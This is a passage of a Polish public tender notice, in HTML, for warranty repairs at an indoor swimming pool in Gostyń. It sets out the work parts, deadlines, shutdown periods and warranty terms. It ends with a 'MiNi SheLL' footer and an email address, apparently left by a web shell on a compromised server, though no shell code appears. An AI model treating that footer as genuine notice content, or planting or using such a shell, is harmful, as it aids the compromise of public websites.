Zakres ww. części zamówienia został szczegółowo określony w przedmiarach załączonych do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.32.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Roboty budowlane, sanitarne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje m. in.:
2.	   Roboty budowlane, sanitarne:
2.1.	Nieszczelność pomieszczeń mokrych - natrysków - patrz pkt 4 projektu remontu gwarancyjnego krytej pływalni;
2.2.	Odpadające płytki w saunie parowej - patrz pkt 11 projektu remontu gwarancyjnego krytej pływalni;
Dotyczy części II:
1.	Zamawiający wymaga, aby każda część przedmiotu zamówienia była objęta min. 3-letnim okresem gwarancji/rękojmi, która rozpocznie swój bieg od daty odbioru końcowego zamówienia przez Zamawiającego.
2.	Zakres rzeczowy przedmiotowego zadania opisany jest szczegółowo w dokumentacji technicznej (projekt budowlany, specyfikacja techniczna wykonania i odbioru robót,  przedmiar robót podzielony na branże: budowlaną, sanitarną w cz. II).
3.	Roboty będą prowadzone w obiekcie wyłączonym z użytkowania. 
Przerwa technologiczna będzie wynosiła 4 tygodnie. Zamawiający zastrzega, że przerwa technologiczna nie może trwać dłużej niż 4 tygodnie. 
4.	Zamawiający wymaga zachowania terminu pośredniego - 4 tygodnie od rozpoczęcia planowanej przerwy technologicznej w pomieszczeniach mokrych, tj.: natryskach w pom. 1,27,1.27a, 1.28, 1.28a.
5.	Pozostałe prace muszą być wykonane do końca umownego terminu.
6.	W przypadku niewykonania w ustalonym terminie prac w pomieszczeniach mokrych, tj.: natryskach w pom. 1,27,1.27a, 1.28, 1.28a w czasie przerwy technologicznej, Zamawiający będzie naliczać kary umowne, zgodnie z postanowieniami umowy, stanowiącej załącznik do SIWZ.
7.	Rozliczenia za media (woda, ścieki, energia elektryczna) nastąpią na podstawie opomiarowania poszczególnych mediów (wskazań zainstalowanych przez wykonawcę urządzeń pomiarowych) lub w formie ryczałtu stanowiącego 0,5% wartości brutto wynagrodzenia Wykonawcy. Płatność na konto Ośrodka Sportu i Rekreacji w Gostyniu. 
8.	Przed złożeniem oferty Zamawiający zaleca dokonanie wizji lokalnej w obiekcie w dni powszednie w godz. od 8:00 do 15:00.
9.	Wykonawca zobowiązany jest do sporządzenia i dostarczenia Zamawiającemu harmonogramu robót przed podpisaniem umowy. Harmonogram należy uzgodnić 
z Zamawiającym. Harmonogram robót musi uwzględniać wszelkie pojedyncze roboty zależne od siebie czasowo i założenia robocze dotyczące poszczególnych etapów robót.
10.	Harmonogram musi uwzględnić termin pośredni - 4 tygodnie od rozpoczęcia przerwy technologicznej na wykonanie robót w pomieszczeniach mokrych, tj.: natryskach 
w pom. 1,27,1.27a, 1.28, 1.28a.
11.	Zamawiający zakłada rozpoczęcie 4 - tygodniowej przerwy technologicznej 
od około 08.04.2013 r. Powyższy termin zostanie szczegółowo określony przy uzgadnianiu harmonogramu robót.
Zakres ww. części zamówienia został szczegółowo określony w przedmiarach załączonych do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Roboty sanitarne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje m. in.:
3.	   Roboty sanitarne: 
3.1.	  Wentylacja - patrz pkt 6 projektu remontu gwarancyjnego krytej pływalni;
Dotyczy części III:
1.	Zamawiający wymaga, aby każda część przedmiotu zamówienia była objęta min. 3-letnim okresem gwarancji/rękojmi, która rozpocznie swój bieg od daty odbioru końcowego zamówienia przez Zamawiającego.
2.	Zakres rzeczowy przedmiotowego zadania opisany jest szczegółowo w dokumentacji technicznej (projekt budowlany, specyfikacja techniczna wykonania i odbioru robót,  przedmiar robót podzielony na branże: budowlaną, sanitarną w cz. III).
3.	Roboty będą prowadzone w obiekcie wyłączonym z użytkowania. Przerwa technologiczna będzie wynosiła 4 tygodnie. Zamawiający zastrzega, że przerwa technologiczna nie może trwać dłużej niż 4 tygodnie. 
4.	Rozliczenia za media (woda, ścieki, energia elektryczna) nastąpią na podstawie opomiarowania poszczególnych mediów (wskazań zainstalowanych przez wykonawcę urządzeń pomiarowych) lub w formie ryczałtu stanowiącego 0,5% wartości brutto wynagrodzenia Wykonawcy. Płatność na konto Ośrodka Sportu i Rekreacji w Gostyniu. 
5.	Przed złożeniem oferty Zamawiający zaleca dokonanie wizji lokalnej w obiekcie w dni powszednie w godz. od 8:00 do 15:00.
6.	Wykonawca zobowiązany jest do sporządzenia i dostarczenia Zamawiającemu harmonogramu robót przed podpisaniem umowy. Harmonogram należy uzgodnić 
z Zamawiającym. Harmonogram robót musi uwzględniać wszelkie pojedyncze roboty zależne od siebie czasowo i założenia robocze dotyczące poszczególnych etapów robót.
7.	Zamawiający zakłada rozpoczęcie 4 - tygodniowej przerwy technologicznej 
od około 08.04.2013 r. Powyższy termin zostanie szczegółowo określony przy uzgadnianiu harmonogramu robót.
8.	Prace muszą być wykonane do końca umownego terminu.
Zakres ww. części zamówienia został szczegółowo określony w przedmiarach załączonych do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.33.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Roboty budowlane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje m. in.:
4.	   Roboty budowlane: 
4.1.	Ubytki w fugach - patrz pkt 5 projektu remontu gwarancyjnego krytej pływalni;                 (w zakres robót wchodzi tylko usunięcie i spoinowanie fug w pomieszczeniach opisanych w przedmiarze z WYŁACZENIEM usuwania i spoinowania niecki: sportowej, do nauki pływania oraz brodzika dla dzieci). 
4.2.	Pęknięte płytki w hali basenowej - patrz pkt 7 projektu remontu gwarancyjnego krytej pływalni;
4.3.	Pęknięte płytki przy kasach - patrz pkt 10 projektu remontu gwarancyjnego krytej pływalni;
Dotyczy części IV:
1.	Zamawiający wymaga, aby każda część przedmiotu zamówienia była objęta min. 3-letnim okresem gwarancji/rękojmi, która rozpocznie swój bieg od daty odbioru końcowego zamówienia przez Zamawiającego.
2.	Zakres rzeczowy przedmiotowego zadania opisany jest szczegółowo w dokumentacji technicznej (projekt budowlany, specyfikacja techniczna wykonania i odbioru robót,  przedmiar robót podzielony na branże: budowlaną, sanitarną w cz. IV).
3.	Roboty będą prowadzone w obiekcie wyłączonym z użytkowania. Przerwa technologiczna będzie wynosiła 4 tygodnie. Zamawiający zastrzega, że przerwa technologiczna nie może trwać dłużej niż 4 tygodnie. 
4.	Zamawiający wymaga zachowania terminu pośredniego - 4 tygodnie od rozpoczęcia planowanej przerwy technologicznej w pomieszczeniach mokrych (w hali basenowej w pom. 1.29, 1.31, 1.32 wraz z plażami i przebieralniach w pom. 1.23, 1.24, 1.25, 1.26) 
z WYŁACZENIEM usuwania i spoinowania niecki: sportowej, do nauki pływania oraz brodzika dla dzieci).
5.	Pozostałe prace muszą być wykonane do końca umownego terminu.
6.	W przypadku niewykonania w ustalonym terminie prac w pomieszczeniach mokrych 
(w hali basenowej w pom. 1.29, 1.31, 1.32 wraz z plażami i przebieralniach w pom. 1.23, 1.24, 1.25, 1.26) z WYŁACZENIEM usuwania i spoinowania niecki: sportowej, do nauki pływania oraz brodzika dla dzieci) w czasie przerwy technologicznej, Zamawiający będzie naliczać kary, zgodnie z postanowieniami umowy, stanowiącej załącznik do SIWZ.
7.	Rozliczenia za media (woda, ścieki, energia elektryczna) nastąpią na podstawie opomiarowania poszczególnych mediów (wskazań zainstalowanych przez wykonawcę urządzeń pomiarowych) lub w formie ryczałtu stanowiącego 0,5% wartości brutto wynagrodzenia Wykonawcy. Płatność na konto Ośrodka Sportu i Rekreacji w Gostyniu. 
8.	Przed złożeniem oferty Zamawiający zaleca dokonanie wizji lokalnej w obiekcie w dni powszednie w godz. od 8:00 do 15:00.
9.	Wykonawca zobowiązany jest do sporządzenia i dostarczenia Zamawiającemu harmonogramu robót przed podpisaniem umowy. Harmonogram należy uzgodnić 
z Zamawiającym. Harmonogram robót musi uwzględniać wszelkie pojedyncze roboty zależne od siebie czasowo i założenia robocze dotyczące poszczególnych etapów robót.
10.	Harmonogram musi uwzględnić termin pośredni - 4 tygodnie od rozpoczęcia przerwy technologicznej na wykonanie robót w pomieszczeniach mokrych (w hali basenowej w pom. 1.29, 1.31, 1.32 wraz z plażami i przebieralniach w pom. 1.23, 1.24, 1.25, 1.26) z WYŁACZENIEM usuwania i spoinowania niecki: sportowej, do nauki pływania oraz brodzika dla dzieci).
11.	Zamawiający zakłada rozpoczęcie 4 - tygodniowej przerwy technologicznej 
od około 08.04.2013r. Powyższy termin zostanie szczegółowo określony przy uzgadnianiu harmonogramu robót.
Zakres ww. części zamówienia został szczegółowo określony w przedmiarach załączonych do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com